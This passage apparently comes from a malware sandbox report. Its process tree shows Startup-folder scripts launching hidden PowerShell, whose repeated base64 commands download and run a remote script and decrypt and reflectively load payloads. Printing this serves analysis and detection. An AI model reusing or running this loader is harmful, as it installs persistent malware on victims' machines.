tTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkbnNvdGcpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRqb3AgaW4gJG5raWt4KSB7CWlmICgkam9wLlN0YXJ0c1dpdGgoJzo6JykpCXsJCSRja3Vodj0kam9wLlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSR1Y3ZpZD1bc3RyaW5nW11dJGNrdWh2LlNwbGl0KCdcJyk7SUVYICckbmh3eXc9cG9jeGEgKGxscXV0IChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJHVjdmlkWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJGZsZmxzPXBvY3hhIChsbHF1dCAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCR1Y3ZpZFsxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtnbXZtciAkbmh3eXcgJG51bGw7Z212bXIgJGZsZmxzICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 728 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2c46f0ee.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 1604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6944 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2c46f0ee.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1808 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkbnNvdGcpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRqb3AgaW4gJG5raWt4KSB7CWlmICgkam9wLlN0YXJ0c1dpdGgoJzo6JykpCXsJCSRja3Vodj0kam9wLlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSR1Y3ZpZD1bc3RyaW5nW11dJGNrdWh2LlNwbGl0KCdcJyk7SUVYICckbmh3eXc9cG9jeGEgKGxscXV0IChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJHVjdmlkWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJGZsZmxzPXBvY3hhIChsbHF1dCAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCR1Y3ZpZFsxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtnbXZtciAkbmh3eXcgJG51bGw7Z212bXIgJGZsZmxzICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 5920 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_b6e52985.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5676 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_b6e52985.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6332 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkbnNvdGcpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRqb3AgaW4gJG5raWt4KSB7CWlmICgkam9wLlN0YXJ0c1dpdGgoJzo6JykpCXsJCSRja3Vodj0kam9wLlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSR1Y3ZpZD1bc3RyaW5nW11dJGNrdWh2LlNwbGl0KCdcJyk7SUVYICckbmh3eXc9cG9jeGEgKGxscXV0IChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJHVjdmlkWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJGZsZmxzPXBvY3hhIChsbHF1dCAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCR1Y3ZpZFsxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtnbXZtciAkbmh3eXcgJG51bGw7Z212bXIgJGZsZmxzICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 3200 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_cad7c66e.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 4248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3312 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_cad7c66e.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2192 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkbnNvdGcpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRqb3AgaW4gJG5raWt4KSB7CWlmICgkam9wLlN0YXJ0c1dpdGgoJzo6JykpCXsJCSRja3Vodj0kam9wLlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSR1Y3ZpZD1bc3RyaW5nW11dJGNrdWh2LlNwbGl0KCdcJyk7SUVYICckbmh3eXc9cG9jeGEgKGxscXV0IChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJHVjdmlkWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJGZsZmxzPXBvY3hhIChsbHF1dCAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCR1Y3ZpZFsxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtnbXZtciAkbmh3eXcgJG51bGw7Z212bXIgJGZsZmxzICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 764 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_ff75f7e1.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 1796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1080 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_ff75f7e1.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3672 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b